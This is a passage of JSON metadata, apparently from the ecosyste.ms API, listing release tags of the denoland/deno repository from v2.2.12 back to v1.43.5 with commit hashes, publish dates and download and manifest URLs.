noland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767